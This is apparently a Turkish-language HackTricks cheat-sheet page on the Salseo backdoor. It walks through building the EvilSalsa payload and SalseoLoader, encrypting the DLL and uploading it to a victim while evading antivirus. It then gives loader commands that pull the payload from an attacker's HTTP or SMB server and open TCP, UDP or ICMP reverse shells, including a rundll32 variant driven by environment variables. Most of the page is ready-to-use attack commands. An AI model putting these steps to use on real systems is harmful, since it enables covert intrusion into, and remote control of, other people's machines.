8 KiB
Salseo
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- 💬 Discord grubuna katılın veya telegram grubuna katılın veya bizi Twitter 🐦 @hacktricks_live'da takip edin.
- Hacking püf noktalarını paylaşarak PR'ler göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
Derlemeleri Oluşturma
Kaynak kodunu github'dan indirin ve EvilSalsa ve SalseoLoader'ı derleyin. Kodu derlemek için Visual Studio'nun yüklü olması gerekmektedir.
Bu projeleri, kullanacak olduğunuz Windows işletim sisteminin mimarisi için derleyin (Windows x64'ü destekliyorsa, bu mimari için derleyin).
Mimarisi Visual Studio içinde "Platform Target" altında sol "Build" Sekmesinde seçebilirsiniz.
(**Bu seçenekleri bulamazsanız, "Project Tab" üzerine tıklayın ve ardından **"<Project Name> Özellikleri"**ne tıklayın)
Daha sonra, her iki projeyi de derleyin (Build -> Build Solution) (Log içinde yürütülebilir dosyanın yolunu göreceksiniz):
Arka Kapıyı Hazırlama
Öncelikle, EvilSalsa.dll'yi kodlamalısınız. Bunu yapmak için encrypterassembly.py adlı python betiğini kullanabilir veya EncrypterAssembly projesini derleyebilirsiniz:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Şimdi Salseo işlemini gerçekleştirmek için ihtiyacınız olan her şeye sahipsiniz: şifrelenmiş EvilDalsa.dll ve SalseoLoader'ın ikili dosyası.
SalseoLoader.exe ikili dosyasını makineye yükleyin. Herhangi bir AV tarafından tespit edilmemeleri gerekiyor...
Arka kapıyı çalıştırın
TCP ters kabuk almak (şifrelenmiş dll'yi HTTP üzerinden indirme)
Ters kabuk dinleyici olarak nc'yi başlatmayı ve şifrelenmiş evilsalsa'yı sunmak için bir HTTP sunucusu başlatmayı unutmayın.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Bir UDP ters kabuk almak (SMB üzerinden kodlanmış dll indirme)
Ters kabuk dinleyici olarak nc'yi başlatmayı ve kodlanmış evilsalsa'yı sunmak için bir SMB sunucusu başlatmayı unutmayın (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
ICMP ters kabuk almak (şifrelenmiş dll zaten kurbanın içinde)
Bu sefer ters kabuk almak için istemci tarafında özel bir araca ihtiyacınız var. İndirin: https://github.com/inquisb/icmpsh
ICMP Yanıtlarını Devre Dışı Bırakın:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
İstemciyi çalıştırın:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
Kurbanın içinde, salseo şeyini çalıştıralım:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Ana işlevi dışa aktaran DLL olarak SalseoLoader'ı derleme
Visual Studio kullanarak SalseoLoader projesini açın.
Ana işlevden önce ekle: [DllExport]
Bu projeye DllExport yükleyin
Araçlar --> NuGet Paket Yöneticisi --> Çözüm İçin NuGet Paketlerini Yönet...
DllExport paketini arayın (Gözat sekmesini kullanarak) ve Yükle'yi seçin (ve açılan pencereyi kabul edin)
Projeler klasörünüzde DllExport.bat ve DllExport_Configure.bat dosyaları görünmelidir.
DllExport'u kaldırın
Kaldır'ı seçin (evet, tuhaf ama bana güvenin, gerekli)
Visual Studio'yu kapatın ve DllExport_configure'ı çalıştırın
Sadece çıkın Visual Studio'dan
Ardından, SalseoLoader klasörüne gidin ve DllExport_Configure.bat'ı çalıştırın
x64'ü seçin (eğer x64 kutusunda kullanacaksanız, benim durumumda olduğu gibi), System.Runtime.InteropServices'ı seçin (DllExport için Namespace içinde) ve Uygula'yı seçin
Projeyi tekrar Visual Studio ile açın
[DllExport] artık hata olarak işaretlenmemelidir
Çözümü derleyin
Çıkış Türü = Sınıf Kitaplığı seçin (Proje --> SalseoLoader Özellikleri --> Uygulama --> Çıkış türü = Sınıf Kitaplığı)
x64 platformunu seçin (Proje --> SalseoLoader Özellikleri --> Derleme --> Platform hedefi = x64)
Çözümü derlemek için: Derle --> Çözümü Derle (Çıktı konsolunda yeni DLL'nin yolu görünecektir)
Oluşturulan Dll'yi test edin
Dll'yi test etmek istediğiniz yere kopyalayın ve yapıştırın.
Çalıştır:
rundll32.exe SalseoLoader.dll,main
Eğer hata görünmüyorsa, muhtemelen işlevsel bir DLL'niz var!!
DLL kullanarak bir kabuk alın
Bir HTTP sunucusu kullanmayı ve bir nc dinleyici ayarlamayı unutmayın
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'ı öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- 💬 Discord grubuna katılın veya telegram grubuna katılın veya bizi Twitter 🐦 @hacktricks_live** takip edin.**
- Hacking püf noktalarını paylaşarak PR göndererek HackTricks](https://github.com/carlospolop/hacktricks) ve HackTricks Cloud github depolarına katkıda bulunun.